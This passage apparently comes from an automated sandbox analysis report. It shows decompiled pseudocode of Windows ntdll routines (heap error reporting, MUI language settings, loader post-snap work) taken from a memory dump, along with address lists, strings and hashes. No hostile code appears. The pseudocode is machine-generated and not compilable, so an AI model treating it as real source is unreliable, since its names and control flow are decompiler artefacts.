					E0487B150();
				} else {
					E0487B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0487B150("Error code: %d - %s\n",  *0x4965898);
				_t113 =  *0x49658a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0487B150();
					} else {
						E0487B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0487B150("Parameter1: %p\n",  *0x49658a4);
				}
				_t115 =  *0x49658a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0487B150();
					} else {
						E0487B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0487B150("Parameter2: %p\n",  *0x49658a8);
				}
				_t117 =  *0x49658ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0487B150();
					} else {
						E0487B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0487B150("Parameter3: %p\n",  *0x49658ac);
				}
				_t119 =  *0x49658b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0487B150();
					} else {
						E0487B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x49658b4);
					E0487B150("Last known valid blocks: before - %p, after - %p\n",  *0x49658b0);
				} else {
					_t120 =  *0x49658b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0487B150();
				} else {
					E0487B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0487B150("Stack trace available at %p\n", 0x49658c0);
			}











                          0x04931c10
                          0x04931c16
                          0x04931c1e
                          0x04931c3d
                          0x04931c3e
                          0x04931c20
                          0x04931c35
                          0x04931c3a
                          0x04931c44
                          0x04931c55
                          0x04931c5a
                          0x04931c65
                          0x04931c67
                          0x00000000
                          0x04931c6e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x04931c67
                          0x04931cdc
                          0x04931ce5
                          0x04931d04
                          0x04931d05
                          0x04931ce7
                          0x04931cfc
                          0x04931d01
                          0x04931d0b
                          0x04931d17
                          0x04931d1f
                          0x04931d25
                          0x04931d30
                          0x04931d4f
                          0x04931d50
                          0x04931d32
                          0x04931d47
                          0x04931d4c
                          0x04931d61
                          0x04931d67
                          0x04931d68
                          0x04931d6e
                          0x04931d79
                          0x04931d98
                          0x04931d99
                          0x04931d7b
                          0x04931d90
                          0x04931d95
                          0x04931daa
                          0x04931db0
                          0x04931db1
                          0x04931db7
                          0x04931dc2
                          0x04931de1
                          0x04931de2
                          0x04931dc4
                          0x04931dd9
                          0x04931dde
                          0x04931df3
                          0x04931df9
                          0x04931dfa
                          0x04931e00
                          0x04931e0a
                          0x04931e13
                          0x04931e32
                          0x04931e33
                          0x04931e15
                          0x04931e2a
                          0x04931e2f
                          0x04931e39
                          0x04931e4a
                          0x04931e02
                          0x04931e02
                          0x04931e08
                          0x00000000
                          0x00000000
                          0x04931e08
                          0x04931e5b
                          0x04931e7a
                          0x04931e7b
                          0x04931e5d
                          0x04931e72
                          0x04931e77
                          0x04931e95

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                          • API String ID: 0-2897834094
                          • Opcode ID: 5381a91605eb08250bbe31e2f4fe83a1ad339166da8236f8f22d7c7835b88cd6
                          • Instruction ID: a2d754f055f5e02ded5ce6dbc78794e21f7f3b9df16a39694370a37a51c155b2
                          • Opcode Fuzzy Hash: 5381a91605eb08250bbe31e2f4fe83a1ad339166da8236f8f22d7c7835b88cd6
                          • Instruction Fuzzy Hash: EC61D936614144DFE251DB48D496E3073A6EB05E767098D3AF90EDB721F668FC40CE1A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04883D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E04883D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04881B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04881B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04881B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04881B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04881B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04894620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E048BF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E048C1370(_t276, 0x4854e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E048BBB40(0,  &_v68, _t170);
									if(L048843C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E048BBB40(_t257,  &_v68, _t243);
								if(L048843C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E048C1370(_t278, 0x4854e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04894620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E048BF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E048C1370(_v16, 0x4854e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E048BBB40(_t262,  &_v68, _t244);
								if(L048843C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E048C1370(_t282, 0x4854e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E048BBB40(_t262,  &_v68, _t201);
							if(L048843C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04894620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E048BF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E048C1370(_t280, 0x4854e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E048BBB40(_t267,  &_v68, _t245);
							if(L048843C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E048C1370(_t284, 0x4854e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E048BBB40(_t267,  &_v68, _t224);
						if(L048843C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                          0x04883d3c
                          0x04883d42
                          0x04883d44
                          0x04883d46
                          0x04883d49
                          0x04883d4c
                          0x04883d4f
                          0x04883d52
                          0x04883d55
                          0x04883d58
                          0x04883d5b
                          0x04883d5f
                          0x04883d61
                          0x04883d66
                          0x048d8213
                          0x048d8218
                          0x04884085
                          0x04884088
                          0x0488408e
                          0x04884094
                          0x0488409a
                          0x048840a0
                          0x048840a6
                          0x048840a9
                          0x048840af
                          0x048840b6
                          0x048840bd
                          0x048840bd
                          0x04883d83
                          0x048d821f
                          0x048d8229
                          0x048d8238
                          0x048d8238
                          0x048d823d
                          0x048d823d
                          0x04883da0
                          0x04883daf
                          0x04883db5
                          0x04883dba
                          0x04883dba
                          0x04883dd4
                          0x04883e94
                          0x04883eab
                          0x04883f6d
                          0x04883f84
                          0x0488406b
                          0x0488406b
                          0x0488406e
                          0x0488406e
                          0x04884070
                          0x04884074
                          0x048d8351
                          0x048d8351
                          0x0488407a
                          0x0488407f
                          0x048d835d
                          0x048d8370
                          0x048d8377
                          0x048d8379
                          0x048d837c
                          0x048d837c
                          0x048d835d
                          0x00000000
                          0x0488407f
                          0x04883f8a
                          0x04883f8d
                          0x04883f90
                          0x04883f95
                          0x048d830d
                          0x048d830f
                          0x04883f9b
                          0x04883fac
                          0x04883fae
                          0x04883fb1
                          0x04883fb1
                          0x04883fb6
                          0x048d8317
                          0x048d831a
                          0x00000000
                          0x04883fbc
                          0x04883fc1
                          0x04883fc9
                          0x04883fd7
                          0x04883fda
                          0x04883fdd
                          0x04884021
                          0x04884021
                          0x04884029
                          0x04884030
                          0x04884044
                          0x04884046
                          0x04884046
                          0x04884044
                          0x04884049
                          0x048d8327
                          0x048d8334
                          0x048d8339
                          0x048d833c
                          0x0488404f
                          0x0488404f
                          0x0488404f
                          0x04884051
                          0x04884056
                          0x04884063
                          0x04884063
                          0x04884068
                          0x00000000
                          0x04884068
                          0x04883fdf
                          0x04883fe2
                          0x04883fe4
                          0x04883fe7
                          0x04883fef
                          0x04884003
                          0x04884005
                          0x04884005
                          0x0488400c
                          0x04884013
                          0x04884016
                          0x04884017
                          0x0488401b
                          0x0488401e
                          0x00000000
                          0x0488401e
                          0x04883fb6
                          0x04883eb1
                          0x04883eb4
                          0x04883eb7
                          0x04883ebc
                          0x048d82a9
                          0x048d82ab
                          0x04883ec2
                          0x04883ed3
                          0x04883ed5
                          0x04883ed8
                          0x04883ed8
                          0x04883edd
                          0x048d82b3
                          0x048d82b6
                          0x00000000
                          0x04883ee3
                          0x04883ee8
                          0x04883eed
                          0x04883ef0
                          0x04883ef3
                          0x04883f02
                          0x04883f05
                          0x04883f08
                          0x048d82c0
                          0x048d82c3
                          0x048d82c5
                          0x048d82c8
                          0x048d82d0
                          0x048d82e4
                          0x048d82e6
                          0x048d82e6
                          0x048d82ed
                          0x048d82f4
                          0x048d82f7
                          0x048d82f8
                          0x048d82fc
                          0x048d82ff
                          0x048d82ff
                          0x04883f0e
                          0x04883f11
                          0x04883f16
                          0x04883f1d
                          0x04883f31
                          0x048d8307
                          0x048d8307
                          0x04883f31
                          0x04883f39
                          0x04883f48
                          0x04883f4d
                          0x04883f50
                          0x04883f50
                          0x04883f53
                          0x04883f58
                          0x04883f65
                          0x04883f65
                          0x04883f6a
                          0x00000000
                          0x04883f6a
                          0x04883edd
                          0x04883dda
                          0x04883ddd
                          0x04883de0
                          0x04883de5
                          0x048d8245
                          0x04883deb
                          0x04883df7
                          0x04883dfc
                          0x04883dfe
                          0x04883e01
                          0x04883e01
                          0x04883e06
                          0x048d824d
                          0x048d824f
                          0x048d8254
                          0x00000000
                          0x04883e0c
                          0x04883e11
                          0x04883e16
                          0x04883e19
                          0x04883e29
                          0x04883e2c
                          0x04883e2f
                          0x048d825c
                          0x048d825f
                          0x048d8261
                          0x048d8264
                          0x048d826c
                          0x048d8280
                          0x048d8282
                          0x048d8282
                          0x048d8289
                          0x048d8290
                          0x048d8293
                          0x048d8294
                          0x048d8298
                          0x048d829b
                          0x048d829b
                          0x04883e35
                          0x04883e38
                          0x04883e3d
                          0x04883e44
                          0x04883e58
                          0x048d82a3
                          0x048d82a3
                          0x04883e58
                          0x04883e60
                          0x04883e6f
                          0x04883e74
                          0x04883e77
                          0x04883e77
                          0x04883e7a
                          0x04883e7f
                          0x04883e8c
                          0x04883e8c
                          0x04883e91
                          0x00000000
                          0x04883e91

                          Strings
                          • Kernel-MUI-Language-Disallowed, xrefs: 04883E97
                          • WindowsExcludedProcs, xrefs: 04883D6F
                          • Kernel-MUI-Language-Allowed, xrefs: 04883DC0
                          • Kernel-MUI-Language-SKU, xrefs: 04883F70
                          • Kernel-MUI-Number-Allowed, xrefs: 04883D8C
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                          • API String ID: 0-258546922
                          • Opcode ID: 8a58731e692707de72e34b9b87473757050384c30ebbe55cdeaef3ee938b22f3
                          • Instruction ID: 43c8eec52b3c7730bf4129160e2f613b7ed239ffd2996d5bfb24ce26853b90c2
                          • Opcode Fuzzy Hash: 8a58731e692707de72e34b9b87473757050384c30ebbe55cdeaef3ee938b22f3
                          • Instruction Fuzzy Hash: 17F17172D00619EFDB11EF98C940AEEB7B9FF08B54F140A5AE905E7611E775AE00CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04888794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E04888794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0488934A() != 0) {
								_t159 = E048FA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x4965780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E048F5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x4965780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0488849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04888999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04888999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x4965c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x4965c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04892280(_t92, 0x49686cc);
															_t94 = E04949DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E048A61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x4965c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04888A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x4965c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x4965c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E048BF380(_t136, 0x4851184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04892280(_t108, 0x49686cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E048A61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04949D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0488FFB0(_t118, _t156, 0x49686cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E048B9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                          0x04888799
                          0x0488879d
                          0x048887a1
                          0x048887a3
                          0x048887a8
                          0x048887c3
                          0x048887c3
                          0x048887c8
                          0x048887d1
                          0x048887d4
                          0x048887d8
                          0x048887e5
                          0x048887ec
                          0x048d9bfe
                          0x048d9c00
                          0x048d9c02
                          0x048d9c08
                          0x048d9c0d
                          0x048d9c0f
                          0x048d9c14
                          0x048d9c2d
                          0x048d9c32
                          0x048d9c37
                          0x048d9c3a
                          0x048d9c3c
                          0x048d9c42
                          0x048d9c42
                          0x048d9c3c
                          0x048d9c02
                          0x048887da
                          0x048887df
                          0x048887e3
                          0x00000000
                          0x00000000
                          0x048887e3
                          0x048887f2
                          0x00000000
                          0x048887fb
                          0x048887fd
                          0x048887fe
                          0x0488880e
                          0x0488880f
                          0x04888810
                          0x04888814
                          0x0488881a
                          0x0488881c
                          0x0488881f
                          0x04888821
                          0x04888822
                          0x04888824
                          0x04888826
                          0x0488882c
                          0x0488882e
                          0x048d9c48
                          0x048d9c48
                          0x04888834
                          0x04888834
                          0x04888837
                          0x00000000
                          0x00000000
                          0x04888837
                          0x0488882e
                          0x0488883d
                          0x04888840
                          0x04888843
                          0x04888846
                          0x04888849
                          0x0488884c
                          0x0488884e
                          0x04888850
                          0x04888852
                          0x04888854
                          0x04888857
                          0x048888b4
                          0x048888b6
                          0x048888b6
                          0x04888859
                          0x04888859
                          0x04888859
                          0x04888861
                          0x04888866
                          0x0488886a
                          0x0488893d
                          0x04888941
                          0x00000000
                          0x04888947
                          0x04888947
                          0x0488894a
                          0x0488894c
                          0x00000000
                          0x04888952
                          0x04888955
                          0x0488895a
                          0x0488895d
                          0x0488895d
                          0x0488895f
                          0x04888961
                          0x04888961
                          0x04888968
                          0x00000000
                          0x00000000
                          0x0488896a
                          0x0488896b
                          0x0488896e
                          0x00000000
                          0x04888970
                          0x04888970
                          0x04888970
                          0x04888970
                          0x04888972
                          0x04888972
                          0x04888974
                          0x00000000
                          0x0488897a
                          0x0488897a
                          0x0488897d
                          0x00000000
                          0x04888983
                          0x048d9c65
                          0x048d9c6d
                          0x048d9c72
                          0x048d9c75
                          0x048d9c75
                          0x048d9c82
                          0x048d9c86
                          0x048d9c87
                          0x048d9c88
                          0x048d9c89
                          0x048d9c8c
                          0x048d9c90
                          0x048d9c95
                          0x048d9c97
                          0x048d9ca0
                          0x048d9ca3
                          0x048d9ca9
                          0x048d9ca9
                          0x00000000
                          0x048d9ca9
                          0x048d9ca3
                          0x00000000
                          0x048d9c97
                          0x0488897d
                          0x00000000
                          0x04888974
                          0x04888988
                          0x04888992
                          0x04888996
                          0x00000000
                          0x04888996
                          0x0488894c
                          0x00000000
                          0x04888870
                          0x0488887b
                          0x0488887d
                          0x0488887f
                          0x04888881
                          0x04888884
                          0x04888884
                          0x04888886
                          0x04888889
                          0x0488888c
                          0x0488888e
                          0x04888891
                          0x04888891
                          0x04888898
                          0x00000000
                          0x00000000
                          0x0488889a
                          0x0488889b
                          0x0488889e
                          0x00000000
                          0x00000000
                          0x048888a0
                          0x048888a8
